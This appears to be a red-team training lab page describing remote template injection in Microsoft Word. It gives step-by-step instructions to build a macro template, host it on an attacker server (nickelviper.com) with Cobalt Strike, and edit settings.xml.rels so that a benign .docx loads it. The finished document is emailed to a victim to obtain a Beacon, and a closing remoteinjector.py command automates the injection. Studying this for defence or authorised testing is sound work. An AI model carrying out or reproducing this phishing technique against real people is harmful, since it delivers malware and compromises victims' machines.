Remote Template Injection

Microsoft Word has the option of creating new documents from a template. Office has some templates pre-installed, you can make custom templates, and even download new ones. Remote Template Injection is a technique where an attacker sends a benign document to a victim, which downloads and loads a malicious template. This template may hold a macro, leading to code execution.

Open Word on the Attacker Desktop, create a new blank document and insert your desired macro. Save this to C:\Payloads as a Word 97-2003 Template (*.dot) file. This is now our "malicious remote template". Use Cobalt Strike to host this file at http://nickelviper.com/template.dot.

Next, create a new document from the blank template located in C:\Users\Attacker\Documents\Custom Office Templates. Add any content you want, then save it to C:\Payloads as a new .docx. Browse to the directory in explorer, right-click and select 7-Zip > Open archive. Navigate to _word > _rels, r_ight-click on settings.xml.rels and select Edit.

This is just a small XML file. Scroll right until you see the Target entry.

Target="file:///C:\Users\Attacker\Documents\Custom%20Office%20Templates\Blank%20Template.dotx"

\

It's currently pointing to the template on our local disk from which the document was created. Simply modify this so it points to the template URL instead.

Target="http://nickelviper.com/template.dot"

\

Save those changes and email the document to Bob. Once the file is opened, you'll see a warning about macros again but allowing them to run will execute the macro in the hosted template, given us a Beacon.

\

---

\

John Woodman created a python tool that can automate this process so that we don't have to modify the XML manually.

ubuntu@DESKTOP-3BSK7NO ~> python3 remoteinjector.py -w http://nickelviper.com/template.dot /mnt/c/Payloads/document.docx
URL Injected and saved to /mnt/c/Payloads/document_new.docx